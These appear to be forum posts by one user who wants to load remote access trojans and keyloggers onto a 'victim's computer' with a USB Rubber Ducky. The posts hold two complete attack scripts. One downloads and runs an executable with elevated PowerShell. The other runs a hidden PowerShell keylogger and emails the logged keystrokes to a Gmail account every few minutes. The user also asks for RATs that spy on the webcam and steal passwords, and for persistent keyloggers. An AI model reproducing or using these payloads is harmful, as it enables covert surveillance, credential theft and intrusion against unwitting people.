Mike Jamieson

Hey Guys, I was wondering if anyone has used the usb rubber ducky to execute a RAT on a victim's computer. I found the script, Payload Windows 10 : Download and execute file with Powershell, on the ducky github and thought it would be a great means to injecting a RAT on victim's computer. Does anyone have experience with this or could share some RAT's that they've used in the past? In particular, RAT's that are able to view webcam, keylog, obtain passwords, transfer files and provide control over the infected machine, etc. Here is the ducky script to Payload Windows 10 : Download and execute file with Powershell: REM Windows 10: Poweshell administrator download and execute file REM Author: Judge2020 REM author website: Judge2020.com REM REM start of script REM REM let the HID enumerate DELAY 1000 GUI r DELAY 200 REM my best attempt at a elevated powershell instance STRING powershell Start-Process powershell -Verb runAs ENTER DELAY 1000 ALT y DELAY 200 STRING $down = New-Object System.Net.WebClient; $url = 'http://www.greyhathacker.net/tools/messbox.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit; I found this repository of various RAT's on github and again was wondering if anyone has any experience with any of them? https://github.com/malwares/Remote-Access-Trojan

Hey Guys, Does anyone have a persistent keylogger script that will still run regardless if the user logs off or shut's down their computer?

well I finally got it to work using the original script from Speed09! I'm ecstatic. I changed my web hosting to a free shared account (https://www.000webhost.com/) and it worked, I'm also noticing that I'm receiving results from hours ago which makes me believe it was working all along. Gmail was blocking the sign in from the script because it was viewed as a less secure app, and I finally got a notification to allow the sign in attempt. I'm noticing that the results appear in single character results which makes it very difficult to actually comprehend what is being typed. Do you use any tools to organize the results? Thank you so much for the help!! Just know you made someone's day and helped ignite my interest in security.

Thank you so much for the response! I'll give this a try and report back.

Does anyone else have any ducky keylogger scripts they would like to share? I sure wish Hak5 would produce a win10 ducky keylogger script with gmail/pastebin output results for the community!

First off I want to thank you for providing educational content to the community. I purchased the USB runner ducky mainly so I can use a keylogger script on it. Unfortunately, I still can't get it to work. I uploaded the mail.ps1 to my server in the public FTP directory, is that the correct directory? See Below the IP address of my server which i changed for security purposes, but is the same IP number format url. Finally I encoded the ducky script using ducky decoder and uploaded the inject.bin file to usb flash drive then put the microSB into the duck. I'm really stuck as to what I'm doing wrong here. Below is the mail.ps1 file I'm using as well which obviously I changed myemail to my actual email@gmail.com with password. DELAY 2000 GUI r DELAY 500 STRING powershell -WindowStyle hidden ENTER DELAY 1500 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 400 STRING Get-Keystrokes -LogPath $env:temp\key.txt ENTER DELAY 200 GUI r DELAY 300 STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1') ENTER $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword') $ReportEmail = New-Object System.Net.Mail.MailMessage $ReportEmail.From = 'myemail' $ReportEmail.To.Add('myemail') $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360} Any insight would be GREATLY appreciated.

Thank you. One last question, How would you disable this script?

How often will the results of the keylogger be sent to your email?

Would love to see this script have the ability to output the results via email.